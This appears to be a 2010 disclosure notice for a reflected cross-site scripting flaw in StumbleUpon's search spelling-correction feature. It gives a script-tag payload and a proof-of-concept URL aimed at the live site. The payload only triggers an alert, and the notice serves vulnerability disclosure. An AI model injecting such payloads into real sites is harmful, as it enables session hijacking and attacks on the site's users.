stumbleupon-xss.txt
Posted on 28 April 2010
|=================================================================================================| | ___ ___ ___ ___ ___ ___ | | / / /\__ ___ / / / | | /:: /:: /::| | / /:: /:: /:: | | /:/: /:/: /:|:| | : /:/: /:/: /:/: | | /:/ : /:/ : /:/|:| |__ /::\__ /::~: /::~: /::~: | | /:/__/ :\__ /:/__/ :\__ /:/ |:| /\__ __/://__/ /:/: :\__ /:/: :\__ /:/: :\__ | | : /__/ : /:/ / /__|:|/:/ / //:/ / /__: /__/ :~: /__/ /_|::/:/ / | | : : /:/ / |:/:/ / ::/__/ :\__ : :\__ |:|::/ / | | : :/:/ / |::/ / :\__ /__/ : /__/ |:|/__/ | | :\__ ::/ / /:/ / /__/ :\__ |:| | | | /__/ /__/ /__/ /__/ |__| | | | |=================================================================================================| | | | Vulnerability............Reflected XSS | | Software.................Stumbleupon.com | | Date.....................4/26/10 | | Site.....................http://cross-site-scripting.blogspot.com/ | | | |=================================================================================================| | | | ##Description## | | | | The code that displays spelling corrections does not encode user submitted data. | | | | | | ##Exploit## | | | | teh<script>alert(0)</script> | | | | | | ##Proof of Concept## | | | | http://www.stumbleupon.com/search?q=teh<script>alert(0)</script> | | | |=================================================================================================|
